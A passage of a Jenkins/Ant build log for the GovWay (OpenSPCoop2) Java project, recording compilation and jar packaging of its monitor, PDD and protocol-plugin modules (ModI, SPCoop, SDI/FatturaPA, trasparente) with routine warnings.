MODE ON ***** 17:58:19 [WARNING] [echo] **************************************** 17:58:19 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/monitor 17:58:19 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:58:20 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/monitor/engine/config/transazioni] 17:58:20 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:58:20 [INFO] [javac] Compiling 54 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:21 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:58:21 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/monitor/openspcoop2_monitor-transazioni_RELEASE.jar 17:58:21 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:24 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:24 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:58:24 [WARNING] [echo] **************************************** 17:58:24 [WARNING] [echo] **** DEBUG MODE ON ***** 17:58:24 [WARNING] [echo] **************************************** 17:58:24 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:58:24 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/monitor/engine/config/ricerche] 17:58:24 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:58:24 [INFO] [javac] Compiling 40 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:25 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/monitor/openspcoop2_monitor-ricerche_RELEASE.jar 17:58:25 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:28 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:28 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:58:28 [WARNING] [echo] **************************************** 17:58:28 [WARNING] [echo] **** DEBUG MODE ON ***** 17:58:28 [WARNING] [echo] **************************************** 17:58:28 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:58:28 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/monitor/engine/config/statistiche] 17:58:28 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:58:28 [INFO] [javac] Compiling 40 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:28 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/monitor/openspcoop2_monitor-statistiche_RELEASE.jar 17:58:28 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:31 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:31 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:58:31 [WARNING] [echo] **************************************** 17:58:31 [WARNING] [echo] **** DEBUG MODE ON ***** 17:58:31 [WARNING] [echo] **************************************** 17:58:31 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:58:31 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/monitor/engine] 17:58:31 [INFO] [javac] Compiling 240 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:34 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/config/statistiche/package-info.class 17:58:34 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/config/ricerche/package-info.class 17:58:34 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/config/transazioni/constants/package-info.class 17:58:34 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/config/transazioni/package-info.class 17:58:34 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/monitor/openspcoop2_monitor-engine_RELEASE.jar 17:58:34 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:37 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:58:37 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:58:37 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 17:58:37 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_monitor_RELEASE.jar 17:58:41 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/SRC_VERSION/org/openspcoop2/pdd 17:58:41 [INFO] [copy] Copying 1198 files to /var/lib/jenkins/workspace/GovWay/build/SRC_VERSION/org/openspcoop2/pdd 17:58:41 [WARNING] [echo] Raccolta informazioni git per impostazione versione... 17:58:44 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:58:44 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:58:44 [WARNING] [echo] **************************************** 17:58:44 [WARNING] [echo] **** DEBUG MODE ON ***** 17:58:44 [WARNING] [echo] **************************************** 17:58:44 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/pdd 17:58:44 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:58:44 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/build/SRC_VERSION/org/openspcoop2/pdd] 17:58:44 [INFO] [javac] Compiling 1122 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:03 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/monitor/constants/package-info.class 17:59:03 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/monitor/package-info.class 17:59:03 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/services/skeleton/package-info.class 17:59:03 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/pdd/openspcoop2_pdd_RELEASE.jar 17:59:03 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:07 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:59:07 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:59:07 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 17:59:07 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_pdd_RELEASE.jar 17:59:11 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/SRC_VERSION 17:59:14 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:14 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:59:14 [WARNING] [echo] **************************************** 17:59:14 [WARNING] [echo] **** DEBUG MODE ON ***** 17:59:14 [WARNING] [echo] **************************************** 17:59:14 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/pdd-test 17:59:14 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:59:14 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/core/src/org/openspcoop2/pdd_test] 17:59:14 [INFO] [javac] Compiling 14 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:15 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/pdd-test/openspcoop2_pdd-test_RELEASE.jar 17:59:15 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:18 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:59:18 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:59:18 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 17:59:18 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_pdd-test_RELEASE.jar 17:59:27 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:27 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:59:27 [WARNING] [echo] **************************************** 17:59:27 [WARNING] [echo] **** DEBUG MODE ON ***** 17:59:27 [WARNING] [echo] **************************************** 17:59:27 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/modipa 17:59:27 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:59:27 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/modipa/src] 17:59:27 [INFO] [javac] Compiling 56 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:29 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/modipa/openspcoop2_modipa-protocol-plugin_RELEASE.jar 17:59:29 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:32 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:32 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:59:32 [WARNING] [echo] **************************************** 17:59:32 [WARNING] [echo] **** DEBUG MODE ON ***** 17:59:32 [WARNING] [echo] **************************************** 17:59:32 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:59:32 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/modipa/src] 17:59:32 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/modipa/openspcoop2_modipa-protocol-config_RELEASE.jar 17:59:32 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:35 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:59:35 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:59:35 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 17:59:35 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_modipa-protocol_RELEASE.jar 17:59:45 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:45 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:59:45 [WARNING] [echo] **************************************** 17:59:45 [WARNING] [echo] **** DEBUG MODE ON ***** 17:59:45 [WARNING] [echo] **************************************** 17:59:45 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/spcoop 17:59:45 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:59:45 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/spcoop/src/it/gov/spcoop/sica/manifest] 17:59:45 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:59:45 [INFO] [javac] Compiling 73 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:46 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:59:46 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/spcoop/openspcoop2_spcoop-protocol-sica-manifest_RELEASE.jar 17:59:46 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:49 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:49 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:59:49 [WARNING] [echo] **************************************** 17:59:49 [WARNING] [echo] **** DEBUG MODE ON ***** 17:59:49 [WARNING] [echo] **************************************** 17:59:49 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:59:49 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/spcoop/src/it/cnipa/collprofiles] 17:59:49 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:59:49 [INFO] [javac] Compiling 22 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:49 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:59:49 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/spcoop/openspcoop2_spcoop-protocol-sica-cnipacollprofiles_RELEASE.jar 17:59:49 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:52 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:52 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:59:52 [WARNING] [echo] **************************************** 17:59:52 [WARNING] [echo] **** DEBUG MODE ON ***** 17:59:52 [WARNING] [echo] **************************************** 17:59:52 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:59:52 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/spcoop/src/it/cnipa/schemas/_2003/egovit/exception1_0] 17:59:52 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:59:52 [INFO] [javac] Compiling 24 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:53 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/spcoop/openspcoop2_spcoop-protocol-sica-cnipaexception_RELEASE.jar 17:59:53 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:56 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:56 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 17:59:56 [WARNING] [echo] **************************************** 17:59:56 [WARNING] [echo] **** DEBUG MODE ON ***** 17:59:56 [WARNING] [echo] **************************************** 17:59:56 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 17:59:56 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/spcoop/src/it/gov/spcoop/sica/wscp] 17:59:56 [WARNING] [javac] anomalous package-info.java path: package-info.java 17:59:56 [INFO] [javac] Compiling 22 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 17:59:56 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 17:59:57 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/spcoop/openspcoop2_spcoop-protocol-sica-wscp_RELEASE.jar 17:59:57 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:01 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:01 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:00:01 [WARNING] [echo] **************************************** 18:00:01 [WARNING] [echo] **** DEBUG MODE ON ***** 18:00:01 [WARNING] [echo] **************************************** 18:00:01 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:00:01 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/spcoop/src] 18:00:01 [INFO] [javac] Compiling 21 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:02 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/spcoop/openspcoop2_spcoop-protocol-sica_RELEASE.jar 18:00:02 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:06 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:06 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:00:06 [WARNING] [echo] **************************************** 18:00:06 [WARNING] [echo] **** DEBUG MODE ON ***** 18:00:06 [WARNING] [echo] **************************************** 18:00:06 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:00:06 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/spcoop/src/it/gov/spcoop/sica/wsbl] 18:00:06 [WARNING] [javac] anomalous package-info.java path: package-info.java 18:00:06 [INFO] [javac] Compiling 60 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:07 [INFO] [javac] Creating empty /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2/constants/package-info.class 18:00:07 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/spcoop/openspcoop2_spcoop-protocol-sica-wsbl_RELEASE.jar 18:00:07 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:12 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:12 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:00:12 [WARNING] [echo] **************************************** 18:00:12 [WARNING] [echo] **** DEBUG MODE ON ***** 18:00:12 [WARNING] [echo] **************************************** 18:00:12 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:00:12 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/spcoop/src] 18:00:12 [INFO] [javac] Compiling 33 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:13 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/spcoop/openspcoop2_spcoop-protocol-plugin_RELEASE.jar 18:00:13 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:17 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:17 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:00:17 [WARNING] [echo] **************************************** 18:00:17 [WARNING] [echo] **** DEBUG MODE ON ***** 18:00:17 [WARNING] [echo] **************************************** 18:00:17 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:00:17 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/spcoop/src] 18:00:17 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/spcoop/openspcoop2_spcoop-protocol-config_RELEASE.jar 18:00:17 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:22 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:22 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:00:22 [WARNING] [echo] **************************************** 18:00:22 [WARNING] [echo] **** DEBUG MODE ON ***** 18:00:22 [WARNING] [echo] **************************************** 18:00:22 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:00:22 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/spcoop/openspcoop2_spcoop-protocol-schemi_RELEASE.jar 18:00:28 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:00:28 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:00:28 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 18:00:28 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_spcoop-protocol_RELEASE.jar 18:00:43 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:43 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:43 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:00:43 [WARNING] [echo] **************************************** 18:00:43 [WARNING] [echo] **** DEBUG MODE ON ***** 18:00:43 [WARNING] [echo] **************************************** 18:00:43 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/trasparente 18:00:43 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:00:44 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/trasparente/src] 18:00:44 [INFO] [javac] Compiling 11 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:44 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/trasparente/openspcoop2_trasparente-protocol-plugin_RELEASE.jar 18:00:44 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:47 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:47 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:00:47 [WARNING] [echo] **************************************** 18:00:47 [WARNING] [echo] **** DEBUG MODE ON ***** 18:00:47 [WARNING] [echo] **************************************** 18:00:47 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:00:47 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/trasparente/src] 18:00:47 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/trasparente/openspcoop2_trasparente-protocol-config_RELEASE.jar 18:00:47 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:00:50 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:00:50 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:00:50 [WARNING] [echo] GIT Repo:[/var/lib/jenkins/workspace/GovWay] 18:00:50 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/openspcoop2_trasparente-protocol_RELEASE.jar 18:01:00 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:00 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:01:00 [WARNING] [echo] **************************************** 18:01:00 [WARNING] [echo] **** DEBUG MODE ON ***** 18:01:00 [WARNING] [echo] **************************************** 18:01:00 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/dist/sdi 18:01:00 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:01:00 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/sdi/src/it/gov/fatturapa/sdi/fatturapa/v1_0] 18:01:00 [WARNING] [javac] anomalous package-info.java path: package-info.java 18:01:00 [INFO] [javac] Compiling 111 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:04 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/sdi/openspcoop2_sdi-protocol-fatturapa-v10_RELEASE.jar 18:01:04 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:09 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:09 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:01:09 [WARNING] [echo] **************************************** 18:01:09 [WARNING] [echo] **** DEBUG MODE ON ***** 18:01:09 [WARNING] [echo] **************************************** 18:01:09 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:01:09 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/sdi/src/it/gov/fatturapa/sdi/fatturapa/v1_1] 18:01:09 [WARNING] [javac] anomalous package-info.java path: package-info.java 18:01:09 [INFO] [javac] Compiling 112 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:11 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/sdi/openspcoop2_sdi-protocol-fatturapa-v11_RELEASE.jar 18:01:11 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:15 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:15 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:01:15 [WARNING] [echo] **************************************** 18:01:15 [WARNING] [echo] **** DEBUG MODE ON ***** 18:01:15 [WARNING] [echo] **************************************** 18:01:15 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:01:15 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/sdi/src/it/gov/agenziaentrate/ivaservizi/docs/xsd/fatture/v1_0/] 18:01:15 [WARNING] [javac] anomalous package-info.java path: package-info.java 18:01:15 [INFO] [javac] Compiling 59 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:16 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/sdi/openspcoop2_sdi-protocol-fatturasemplificata-v10_RELEASE.jar 18:01:16 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:19 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:19 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:01:19 [WARNING] [echo] **************************************** 18:01:19 [WARNING] [echo] **** DEBUG MODE ON ***** 18:01:19 [WARNING] [echo] **************************************** 18:01:19 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:01:19 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/sdi/src/it/gov/agenziaentrate/ivaservizi/docs/xsd/fatture/v1_2/] 18:01:19 [WARNING] [javac] anomalous package-info.java path: package-info.java 18:01:19 [INFO] [javac] Compiling 113 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:22 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/sdi/openspcoop2_sdi-protocol-fatturapa-v12_RELEASE.jar 18:01:22 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:27 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:27 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:01:27 [WARNING] [echo] **************************************** 18:01:27 [WARNING] [echo] **** DEBUG MODE ON ***** 18:01:27 [WARNING] [echo] **************************************** 18:01:27 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:01:27 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/sdi/src/it/gov/fatturapa/sdi/messaggi/v1_0] 18:01:27 [WARNING] [javac] anomalous package-info.java path: package-info.java 18:01:27 [INFO] [javac] Compiling 47 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:29 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/sdi/openspcoop2_sdi-protocol-messaggi-v10_RELEASE.jar 18:01:29 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:34 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:34 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:01:34 [WARNING] [echo] **************************************** 18:01:34 [WARNING] [echo] **** DEBUG MODE ON ***** 18:01:34 [WARNING] [echo] **************************************** 18:01:34 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:01:34 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/sdi/src/it/gov/agenziaentrate/ivaservizi/docs/xsd/fattura/messaggi/v1_0] 18:01:34 [WARNING] [javac] anomalous package-info.java path: package-info.java 18:01:34 [INFO] [javac] Compiling 34 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:36 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/sdi/openspcoop2_sdi-protocol-messaggi-fattura-v10_RELEASE.jar 18:01:36 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:40 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:40 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:01:40 [WARNING] [echo] **************************************** 18:01:40 [WARNING] [echo] **** DEBUG MODE ON ***** 18:01:40 [WARNING] [echo] **************************************** 18:01:40 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:01:40 [WARNING] [echo] compileSRC[/var/lib/jenkins/workspace/GovWay/protocolli/sdi/src/it/gov/fatturapa/sdi/ws/ricezione/v1_0/types] 18:01:40 [WARNING] [javac] anomalous package-info.java path: package-info.java 18:01:40 [INFO] [javac] Compiling 27 source files to /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:41 [INFO] [jar] Building jar: /var/lib/jenkins/workspace/GovWay/dist/sdi/openspcoop2_sdi-protocol-wsricezione-v10_RELEASE.jar 18:01:41 [INFO] [delete] Deleting directory /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:45 [INFO] [mkdir] Created dir: /var/lib/jenkins/workspace/GovWay/build/compile-jar-openspcoop2 18:01:45 [WARNING] [echo] Java home: /opt/openjdk-21.0.7+6 18:01:45 [WARNING] [echo] **************************************** 18:01:45 [WARNING] [echo] **** DEBUG MODE ON ***** 18:01:45 [WARNING] [echo] **************************************** 18:01:45 [WARNING] [echo] Raccolta informazioni git per inserimento in manifest... 18:01:45 [WARNING] [echo] 